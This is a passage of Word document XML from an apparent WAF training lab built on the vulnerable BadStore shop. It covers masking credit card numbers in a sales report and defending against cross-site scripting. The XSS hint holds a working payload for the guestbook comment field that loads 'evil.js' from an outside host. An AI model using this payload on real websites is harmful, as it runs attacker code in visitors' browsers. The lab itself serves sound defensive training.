        <w:t xml:space="preserve"> Administration Menu by navigating to </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>badstore.cgi?action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">  I chose “View Sales Reports” and clicked “Do It.”  I glanced at the auditor and her eyes were wide</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">!  </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">She said something about how we were showing full credit card numbers, and PCI compliance, and threatened legal consequences. What do I do???  I </w:t>
      </w:r>
      <w:r w:rsidR="2681B805">
        <w:rPr/>
        <w:t>do not</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> want to lose my super-cool sales report though, I use that daily to reconcile inventory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="009307BA" w:rsidRDefault="00D140A2" w14:paraId="055B987C" w14:textId="14991DC3">
      <w:r>
        <w:t>How can you fix this glaring security hole?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="00D140A2" w:rsidRDefault="00D140A2" w14:paraId="5117795C" w14:textId="3DDB2A04">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="62703AE9" w:rsidP="32965056" w:rsidRDefault="62703AE9" w14:paraId="54B3A592" w14:textId="44BF5371">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="62703AE9">
        <w:rPr/>
        <w:t>Try for yourself and run through the steps to reproduce what the auditor saw.  Notice if you do follow the flow – you will see credit card information... which is what we want</w:t>
      </w:r>
      <w:r w:rsidR="39A71567">
        <w:rPr/>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="62703AE9">
        <w:rPr/>
        <w:t xml:space="preserve"> avoid.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="00D140A2" w:rsidRDefault="00D140A2" w14:paraId="1BE7B55F" w14:textId="1D5D6769">
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">Look for a </w:t>
      </w:r>
      <w:r w:rsidR="6202FA0C">
        <w:rPr/>
        <w:t xml:space="preserve">WAFaaS </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>component</w:t>
      </w:r>
      <w:r w:rsidR="7E8B19AC">
        <w:rPr/>
        <w:t xml:space="preserve"> which can be used to </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>prevent sensitive information from being leaked out from the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32F6121D" w:rsidRDefault="00D140A2" w14:paraId="00345E41" w14:textId="0D2D4AE8">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="00D140A2">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="00D140A2" w:rsidRDefault="00D140A2" w14:paraId="33203AA9" w14:textId="04E6401E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>Add the Data Theft Protection component.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28FAB926" w:rsidP="21B1CB40" w:rsidRDefault="28FAB926" w14:paraId="05B4B943" w14:textId="33E69DCE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="28FAB926">
        <w:drawing>
          <wp:inline wp14:editId="39AB4E25" wp14:anchorId="1E5C864C">
            <wp:extent cx="5619752" cy="2191702"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1023952791" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R536b265db9424b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2191702"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="00D140A2" w:rsidRDefault="00D140A2" w14:paraId="0BF19775" w14:textId="3E788D16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Turn on Data Theft Protection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="00D140A2" w:rsidRDefault="00D140A2" w14:paraId="10367F31" w14:textId="31D3BE8A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>Click Add Element</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">Give it a </w:t>
      </w:r>
      <w:r w:rsidR="23E0A8FA">
        <w:rPr/>
        <w:t>name and</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> choose Credit Cards for Identity Theft Type</w:t>
      </w:r>
      <w:r w:rsidR="5C674373">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">The customer </w:t>
      </w:r>
      <w:r w:rsidR="5E8AE0BA">
        <w:rPr/>
        <w:t>does not</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> want the entire report blocked, so make sure you choose Cloak under Action</w:t>
      </w:r>
      <w:r w:rsidR="62E8A554">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">You can leave the 4 </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>initial</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> characters and 0 trailing characters</w:t>
      </w:r>
      <w:r w:rsidR="1BBA3D76">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>Click Add.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="00D140A2" w:rsidRDefault="00D140A2" w14:paraId="4ABE6E42" w14:textId="39A5356D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>Click Save</w:t>
      </w:r>
      <w:r w:rsidR="45BD5C78">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="50D9FEAE" w:rsidP="699639B3" w:rsidRDefault="50D9FEAE" w14:paraId="218D4DBF" w14:textId="792DC196">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="50D9FEAE">
        <w:rPr/>
        <w:t>Refresh the “View Sales Reports</w:t>
      </w:r>
      <w:r w:rsidR="50D9FEAE">
        <w:rPr/>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="50D9FEAE">
        <w:rPr/>
        <w:t xml:space="preserve">  Note: The </w:t>
      </w:r>
      <w:r w:rsidR="5CD47A98">
        <w:rPr/>
        <w:t>CCs</w:t>
      </w:r>
      <w:r w:rsidR="50D9FEAE">
        <w:rPr/>
        <w:t xml:space="preserve"> that are not masked are </w:t>
      </w:r>
      <w:r w:rsidR="136F014C">
        <w:rPr/>
        <w:t>invalid</w:t>
      </w:r>
      <w:r w:rsidR="50D9FEAE">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1A668983">
        <w:rPr/>
        <w:t xml:space="preserve">credit card numbers, in other words </w:t>
      </w:r>
      <w:r w:rsidR="50D9FEAE">
        <w:rPr/>
        <w:t>not true Luhn algorithm CC numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="32F6121D" w:rsidRDefault="699639B3" w14:paraId="2E8C295A" w14:textId="6A75FB0C">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="32F6121D" w:rsidRDefault="699639B3" w14:paraId="1C1D3ABB" w14:textId="42CEAC8F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Security Concern: XSS Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="30DB4EA1" w:rsidRDefault="699639B3" w14:paraId="734C4E40" w14:textId="79358953">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="30DB4EA1" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The customer reports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="32F6121D" w:rsidRDefault="699639B3" w14:paraId="5A36A44C" w14:textId="4DECD9E8">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="200" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="864" w:right="864"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">People are complaining they are getting viruses and strange behavior when they go to my website. They are not going to shop with me if they </w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="30BD99C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> trust the reputation of my online store. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="30DB4EA1" w:rsidRDefault="699639B3" w14:paraId="0DF475A5" w14:textId="669FD06E">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="30DB4EA1" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>How can you fix this?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="30DB4EA1" w:rsidRDefault="699639B3" w14:paraId="2A7A698C" w14:textId="7920AAE1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="40" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="30DB4EA1" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="30DB4EA1" w:rsidRDefault="699639B3" w14:paraId="7A80C164" w14:textId="39FC387E">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="30DB4EA1" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Run a XSS injection in your browser against the IP of badstore not protected by the WAF. The run an XSS injection on the IP of the badstore protected by the WAF – compare the results. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="30DB4EA1" w:rsidRDefault="699639B3" w14:paraId="4E3FFDD7" w14:textId="48C7432E">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="30DB4EA1" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The comment field of the guestbook is vulnerable to this. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="30DB4EA1" w:rsidRDefault="699639B3" w14:paraId="61999346" w14:textId="7C55D6E7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="09443863" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">An example XSS attack would be </w:t>
      </w:r>
      <w:r w:rsidRPr="09443863" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;img src=1 onerror="s=document.createElement('script');s.src='</w:t>
      </w:r>
      <w:hyperlink r:id="Rfb27b3a3a0f54f37">
        <w:r w:rsidRPr="09443863" w:rsidR="7212A78D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="09443863" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="21B1CB40" w:rsidRDefault="699639B3" w14:paraId="0DF532FA" w14:textId="3870962F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="1A12C7EA">
        <w:drawing>
          <wp:inline wp14:editId="2C0F5DF8" wp14:anchorId="5BD08D69">
            <wp:extent cx="5943600" cy="3552825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1671072933" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R7cd171a20c4245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52825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidRDefault="32F6121D" w14:paraId="54BD724E" w14:textId="4A99CF11">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="30DB4EA1" w:rsidRDefault="699639B3" w14:paraId="5AAF8D09" w14:textId="619EF7DD">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="40" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="30DB4EA1" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="6E7633A8" w:rsidRDefault="699639B3" w14:paraId="533C48E0" w14:textId="2B0CAB53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276"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6E7633A8" w:rsidR="14C3B6B7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Browse </w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to the IP address of the </w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="3788206F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Origin </w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="09B6A24D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
